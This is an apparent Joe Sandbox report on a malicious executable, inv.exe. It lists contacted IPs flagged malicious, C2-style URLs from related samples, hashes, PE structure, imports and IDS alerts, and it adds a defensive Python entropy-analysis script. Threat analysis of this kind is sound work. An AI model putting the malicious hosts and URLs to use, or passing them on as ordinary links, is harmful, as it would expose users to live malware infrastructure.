                                                                            http://www.typography.netDexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://fontfabrik.comexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.fonts.comexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.sandoll.co.krexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.sakkal.comexplorer.exe, 00000003.00000000.266498704.000000000BE76000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://code.jquery.com/jquery-3.3.1.min.jssystray.exe, 00000005.00000002.1317017162.00000000051FF000.00000004.00000001.sdmpfalse
                                                                                      high

                                                                                      Contacted IPs


                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.164.35.80 | unknown | United States | 18779 | EGIHOSTINGUS | true
173.192.101.248 | unknown | United States | 36351 | SOFTLAYERUS | true
81.88.57.68 | unknown | Italy | 39729 | REGISTER-ASIT | true
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
23.227.38.74 | unknown | Canada | 13335 | CLOUDFLARENETUS | true
184.168.131.241 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
192.185.199.129 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true

                                                                                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323024
Start date: 26.11.2020
Start time: 08:22:35
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: inv.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/0@19/7
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 33% (good quality ratio 31%)
• Quality average: 75.9%
• Quality standard deviation: 29.8%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                      • TCP Packets have been reduced to 100
                                                                                      • Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.88.21.125, 92.122.144.200, 51.11.168.160, 8.248.117.254, 8.248.121.254, 67.27.233.254, 8.248.119.254, 8.248.113.254, 40.67.254.36, 52.155.217.156, 20.54.26.129, 52.142.114.176, 92.122.213.247, 92.122.213.194, 104.43.139.144, 51.104.139.180, 13.83.66.189, 13.83.66.22, 13.83.66.119, 13.88.85.215, 13.83.66.62, 13.83.65.212, 40.127.240.158, 51.104.144.132
                                                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      No simulations

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

Match | Associated Sample Name / URL | Detection | Context
81.88.57.68 | Shipping documents.exe | malicious | www.holo-collectif.com/4psn/?FFND=w4k5gE5gxoZrrgJ1aUXMPfRJJQUodG5hV1IlEYG+uS/jLDVs3ntmJjx1wOuiSxndPp8eMO09Xg==&ArR=Vtx4i
81.88.57.68 | Teklif Rusya 24 09 2020.doc | malicious | www.henrikvictorin.com/pua/
81.88.57.68 | KRD2020000000002 PDF.exe | malicious | www.netw.site/hnh/
81.88.57.68 | php.exe | malicious | europdiscount.com/js/vendor/TT.tif
81.88.57.68 | 19763cbe5a.exe | malicious | www.cobagim.net/xb/
81.88.57.68 | 18RFQ 14034.exe | malicious | www.cobagim.net/xb/?3f=cdk4&Aby=uAfPQh9ant+iqjQ5jYefPslzjQgav++kJ4CGon9YeS496QLErjlcqfZx+c1TlqkqnZEbA1jfImeXtPasTb/f
34.102.136.180 | anthon.exe | malicious | www.stlmache.com/94sb/?D8c=zlihirZ0hdZXaD&8pdPSNhX=oHhCnRhAqLFON9zTJDssyW7Qcc6qw5o0Z4654po5P9rAmpqiU8ijSaSHb7UixrcmwTy4
34.102.136.180 | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | www.messianicentertainment.com/mkv/
34.102.136.180 | Scan 25112020 pdf.exe | malicious | www.youarecoveredamerica.com/cxs/?wR=30eviFukjpDMKdZAPLSN5kaysTzlcADcsOyOixR0/60FoTO0nFa3+4ZYvhmf8uIzSvTf&V4=inHXwbhx
34.102.136.180 | PO EME39134.xlsx | malicious | www.pethgroup.com/mfg6/?NL08b=wzYKSVBwuJMkKFzZssaTzgW2Vk9zJFgyObnh9ous05GVmO8iDcl865kQdMMIGiQlXQz3Bg==&Ab=JpApTx
34.102.136.180 | PRODUCT INQUIRY BNQ1.xlsx | malicious | www.d2cbox.com/coz3/?RFN4=Db4oM/0ZSLcS2WrsSk0EAPitYAH7G5kPXSBsu1Ti9XYpj/EUmwYzXG6I+6XEGkDvXHlCmg==&RB=NL00JzKhBv9HkNRp
34.102.136.180 | Document Required.xlsx | malicious | www.vegbydesign.net/et2d/?LDHDp=V0L4Gg8XEG33noZ7KcimyECCbO7JKaiXnbIiZHmOm/4B4fbkqB2G6gSUl7eOq1VGLYG7cQ==&1bY8l=ktg8tf6PjX7
34.102.136.180 | Payment - Swift Copy.exe | malicious | www.meetyourwish.com/mnc/?Mdkdxdax=WY4KUSY8ftRWBzX7AqE30jxuDiwNulyYTSspkj6O426HLT41/FrvTZzWmkvAdUuy3I6l&ZVj0=YN6tXn0HZ8X
34.102.136.180 | Shipment Document BLINV And Packing List Attached.exe | malicious | www.kanmra.com/bg8v/?DXIXO=bN+sZwdqksHEVUXNrgv1qWKxxuRS+qOVBUFqNGSJvK31ERFsrbT8+Ywa/qntJ641tecm&Jt7=XPv4nH2h
34.102.136.180 | SR7UzD8vSg.exe | malicious | www.seatoskyphotos.com/g65/?7nwhJ4l=TXJeSLolb01vansOrhIgOMhNYUnQdj/rfF4amJcBrUYE+yYYkSMe6xNPoYCNXAECPfCM&PpJ=2dGHUZtH1RcT9x
34.102.136.180 | fSBya4AvVj.exe | malicious | www.crdtchef.com/coz3/?uVg8S=yVCTVPM0BpPlbRn&Cb=6KJmJcklo30WnY6vewxcXLig2KFmxMKN3/pat9BWRdDInxGr1qf1MmoT0+9/86rmVbJja+uPDg==
34.102.136.180 | 7OKYiP6gHy.exe | malicious | www.space-ghost.com/mz59/?DxlpdH=bx7WlvEZr3O5XBwInsT/p4C3h10gePk/QJkiFTbVYZMx/qNyufU701Fr8sAaS9DQf7SJ&k2Jxtb=fDHHbT_hY
34.102.136.180 | ptFIhqUe89.exe | malicious | www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH
34.102.136.180 | G1K3UzwJBx.exe | malicious | www.softdevteams.com/wsu/?JfBpEB4H=UDFlvLrb363Z/K3+q9OjWueixmKoOm8xQw3Yd3ofqrJMoI6bXqsuqW1H0uReyIz+CvJE&odqddr=RzuhPD
34.102.136.180 | ARRIVAL NOTICE.xlsx | malicious | www.befitptstudio.com/ogg/?oN9xX=4mwbOnk+WEse1PEPUI+9OE7CuRKrYpR8Uy9t/eBM2SPWQ9N1Pm1uQBQ852Ah+FLlD8dO/Q==&r8=-ZoxsbmheH5H_0_
34.102.136.180 | Confectionary and choco.xlsx | malicious | www.thesiromiel.com/kgw/?qDH4D=f8c0xBrPYPKd&ML30a=2i2TlC6nSGv7nfRnhje0HOiHksQfPDJcIBIB+Miyp4ApD+T5OEbWO8tIEn4OYJPJCmlhDQ==
34.102.136.180 | C03N224Hbu.exe | malicious | www.pethgroup.com/mfg6/?Dz=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSeqAONTEuC2HA&lnuh=TxllfFx
34.102.136.180 | EME.39134.xlsx | malicious | www.hrreverie.com/mfg6/?yzux_nSp=j2HGGFUSYNztypOYAYoDf2aqNzVZr1eTDPiKbLutMj6KkAEvkO3e6W3a8VBJiEhjVXb3Fg==&rF=_HCtZ4
34.102.136.180 | new quotation order.exe | malicious | www.themillticket.com/mkr/
34.102.136.180 | Tracking No_SINI0068206497.exe | malicious | www.beastbodiwear.com/rte/
34.102.136.180 | Inv.exe | malicious | www.listenlock.com/tabo/?lJBxHNf=qHWwj9u0E2cmAIu7YDbyCIWW3d2afC0AE1VRYbIr4Uq94LoC64IoilCuXr2fc4qqoNrL9UXR9g==&_jlT_=Zfdl7rLHRt

                                                                                      Domains


                                                                                      ASN


                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      No created / dropped files found

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.390860835474735
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:inv.exe
                                                                                      File size:494592
                                                                                      MD5:55f30220e8a613753f178fb901e5e5a6
                                                                                      SHA1:967f28afe30615264a38dd1ca7b6c818438c180f
                                                                                      SHA256:d8bd3b0fca3a390368fca5b01235e11176b46216b220b79c5548cf63979598c9
                                                                                      SHA512:912518c41e67054c28ece6e684d3dd24cde95153c38a329a5144f3ebab28fa01c89aa1f974df486e8245b05fe1fe13ce4a9b6d5c47a6a22d0147a2650c9afaa0
                                                                                      SSDEEP:12288:0Rx/a5/lGPEx31b14SJVPR6EdER1A+LgaV0RU2Zujxe:0Rx/Qb140NR6FLUS0RPmg
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.W.Q...Q...Q...9...Q...9...Q...9...Q..-....Q..-....Q..-....Q...9...Q...Q...Q..5....Q..5.G..Q...Q/..Q..5....Q..Rich.Q.........

                                                                                      File Icon

                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x40174b
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows cui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5FBDE14E [Wed Nov 25 04:45:02 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:eda0ffe0c86db5b8106d96e0edb76792

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      call 00007FEA40A5EA98h
                                                                                      jmp 00007FEA40A5E1F3h
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push 00000000h
                                                                                      call dword ptr [0043F0D0h]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call dword ptr [0043F0CCh]
                                                                                      push C0000409h
                                                                                      call dword ptr [0043F0D4h]
                                                                                      push eax
                                                                                      call dword ptr [0043F0D8h]
                                                                                      pop ebp
                                                                                      ret
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 00000324h
                                                                                      push 00000017h
                                                                                      call 00007FEA40A974C4h
                                                                                      test eax, eax
                                                                                      je 00007FEA40A5E3A7h
                                                                                      push 00000002h
                                                                                      pop ecx
                                                                                      int 29h
                                                                                      mov dword ptr [00478088h], eax
                                                                                      mov dword ptr [00478084h], ecx
                                                                                      mov dword ptr [00478080h], edx
                                                                                      mov dword ptr [0047807Ch], ebx
                                                                                      mov dword ptr [00478078h], esi
                                                                                      mov dword ptr [00478074h], edi
                                                                                      mov word ptr [004780A0h], ss
                                                                                      mov word ptr [00478094h], cs
                                                                                      mov word ptr [00478070h], ds
                                                                                      mov word ptr [0047806Ch], es
                                                                                      mov word ptr [00478068h], fs
                                                                                      mov word ptr [00478064h], gs
                                                                                      pushfd
                                                                                      pop dword ptr [00478098h]
                                                                                      mov eax, dword ptr [ebp+00h]
                                                                                      mov dword ptr [0047808Ch], eax
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      mov dword ptr [00478090h], eax
                                                                                      lea eax, dword ptr [ebp+08h]
                                                                                      mov dword ptr [0047809Ch], eax
                                                                                      mov eax, dword ptr [ebp-00000324h]
                                                                                      mov dword ptr [00477FD8h], 00010001h

                                                                                      Data Directories

                                                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x46e5c | 0xdc | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7b000 | 0x1e0 | .rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0x2034 | .reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x461c0 | 0x1c | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x461e0 | 0x40 | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x3f000 | 0x208 | .rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x3d7ff0x3d800False0.431243648374data6.60475673829IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x3f0000x89e40x8a00False0.457116168478data5.15519917077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x480000x312700x30000False0.988525390625data7.98788058627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .gfids0x7a0000x1680x200False0.33984375data2.08961442653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x7b0000x1e00x200False0.53125data4.71767883295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x7c0000x20340x2200False0.779641544118data6.55579183588IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
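The Entropy column above is the one static figure worth acting on: .data is writable, 0x30000 bytes on disk and scores 7.988 of a possible 8.0, which is what an embedded compressed or encrypted payload looks like before it is unpacked in memory. The following script is an added example and is not part of the Joe Sandbox report or of inv.exe: it walks a PE section table, computes per-section Shannon entropy the same way, and flags writable non-code sections above a threshold. The PE it parses is constructed in memory with a .text/.rdata/.data layout; its bytes are synthetic, and the 7.5 threshold is a triage heuristic chosen for the example, not a figure from the report.

```python
# Added example (not Joe Sandbox output): PE section-table walk with per-section
# Shannon entropy and a packed-section flag. The sample image is constructed
# below; its contents are synthetic and are not bytes from inv.exe.
import math
import random
import struct
from collections import Counter

SECTION_HDR_SIZE = 40                       # sizeof(IMAGE_SECTION_HEADER)
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image: bytes) -> list[dict]:
    """One dict per section header, with the entropy of its raw file data."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]          # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe_off + 4)
    sec_off = pe_off + 4 + 20 + opt_size                        # section table follows the optional header
    sections = []
    for i in range(nsec):
        (name, vsize, va, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", image, sec_off + i * SECTION_HDR_SIZE)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "entropy": shannon_entropy(raw), "chars": chars,
        })
    return sections


def flag_packed_sections(sections: list[dict], threshold: float = 7.5) -> list[str]:
    """Names of writable, non-code sections at or above `threshold` bits/byte.
    7.5 is a triage heuristic assumed for this example: compressed or encrypted
    payloads staged for unpacking score 7.9+, ordinary initialised data far less."""
    return [s["name"] for s in sections
            if s["entropy"] >= threshold
            and s["chars"] & IMAGE_SCN_MEM_WRITE
            and not s["chars"] & IMAGE_SCN_CNT_CODE]


def _align(n: int, a: int) -> int:
    return (n + a - 1) // a * a


def build_sample_pe() -> bytes:
    """Constructed PE32 with a .text/.rdata/.data layout like the table above.
    Only the fields parse_sections() reads are populated; the optional header is
    zero-filled apart from its PE32 magic, so this image is not loadable."""
    file_align, sect_align = 0x200, 0x1000
    rng = random.Random(1)                                       # deterministic filler
    payloads = [
        (b".text", b"\x55\x8b\xec\x90" * 64,                      # repeated prologue bytes: low entropy
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".rdata", b"kernel32.dll\0GetProcAddress\0" * 8,        # strings: moderate entropy
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
        (b".data", bytes(rng.getrandbits(8) for _ in range(4096)),  # stands in for an encrypted blob
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    pe_off = 0x40
    opt_hdr = struct.pack("<H", 0x10B) + bytes(222)              # 224-byte PE32 optional header
    headers_end = pe_off + 4 + 20 + len(opt_hdr) + SECTION_HDR_SIZE * len(payloads)
    raw_ptr, va = _align(headers_end, file_align), sect_align
    sec_hdrs, body = b"", b""
    for name, content, chars in payloads:
        raw_size = _align(len(content), file_align)
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(content), va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += content.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += _align(len(content), sect_align)
    dos_hdr = b"MZ" + bytes(0x3A) + struct.pack("<I", pe_off)    # e_lfanew sits at offset 0x3c
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, len(opt_hdr), 0x0102)
    headers = dos_hdr + b"PE\0\0" + file_hdr + opt_hdr + sec_hdrs
    return headers.ljust(_align(headers_end, file_align), b"\0") + body


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s['name']:<8} VA=0x{s['va']:x} raw=0x{s['raw_size']:x} entropy={s['entropy']:.3f}")
    print("suspicious:", flag_packed_sections(secs))
```

Entropy is measured over the raw file bytes of each section, as the report does, so padding up to the file alignment lowers the figure slightly; a real sample should be read with `parse_sections(open(path, "rb").read())`. A high-entropy .data section on its own is not proof of packing, but combined with the process-hollowing and API-resolution signatures listed for this sample it tells the analyst where the second stage is most likely stored.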

Resources

Name        | RVA     | Size  | Type                  | Language | Country
RT_MANIFEST | 0x7b060 | 0x17d | XML 1.0 document text | English  | United States

Imports

DLL          | Imports
KERNEL32.dll | SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, SetConsoleCtrlHandler, ReadFile, ReadConsoleW, LCMapStringW, CompareStringW, CreateFileW, WriteConsoleW, GetTimeFormatW, EncodePointer, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, GetStringTypeW, GetFileType, SetStdHandle, DecodePointer, GetConsoleWindow, LoadLibraryA, GetProcAddress, GetProcessHeap, CloseHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedPushEntrySList, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, GetCurrentThread, OutputDebugStringW, FindClose, FindFirstFileExW, RaiseException
WINSPOOL.DRV | ScheduleJob, GetPrinterDriverW, DeviceCapabilities, AddPrinterConnectionA
MSWSOCK.dll  | AcceptEx, rresvport
SHLWAPI.dll  | StrCmpNA, PathUnmakeSystemFolderW, UrlIsOpaqueA, PathRemoveFileSpecA
MSVFW32.dll  | DrawDibClose, ICInstall, ICCompressorFree, GetSaveFileNamePreviewW
AVIFIL32.dll | AVIFileOpen, EditStreamSetInfoW, AVIFileExit
msi.dll      |
GDI32.dll    | GetGlyphIndicesW, GetCurrentObject, GetDeviceGammaRamp, GetDCPenColor, FillPath, SetBitmapDimensionEx
MSACM32.dll  | acmDriverOpen, acmFormatDetailsA, acmFilterChooseA, acmFilterEnumW, acmDriverEnum, acmFormatChooseA
USER32.dll   | ShowWindow, CallWindowProcW

Possible Origin

Language of compilation system | Country where language is spoken
English                        | United States

Network Behavior

Snort IDS Alerts

Timestamp                | Protocol | SID  | Message                        | Source Port | Dest Port | Source IP      | Dest IP
11/26/20-08:25:31.024852 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49756     | 34.102.136.180 | 192.168.2.7
11/26/20-08:26:13.841572 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49759     | 34.102.136.180 | 192.168.2.7
11/26/20-08:26:54.805349 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49761     | 23.227.38.74   | 192.168.2.7
11/26/20-08:27:15.187453 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49762     | 34.102.136.180 | 192.168.2.7
11/26/20-08:27:58.179707 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49763     | 34.102.136.180 | 192.168.2.7
11/26/20-08:28:39.690175 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49770     | 34.102.136.180 | 192.168.2.7
11/26/20-08:29:40.785352 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49772     | 34.102.136.180 | 192.168.2.7
11/26/20-08:31:04.036468 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49778     | 34.102.136.180 | 192.168.2.7
11/26/20-08:31:44.742126 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden | 80          | 49780     | 34.102.136.180 | 192.168.2.7

Network Port Distribution

TCP Packets

Timestamp                           | Source Port | Dest Port | Source IP       | Dest IP
Nov 26, 2020 08:25:10.576143026 CET | 49753       | 80        | 192.168.2.7     | 81.88.57.68
Nov 26, 2020 08:25:10.604172945 CET | 80          | 49753     | 81.88.57.68     | 192.168.2.7
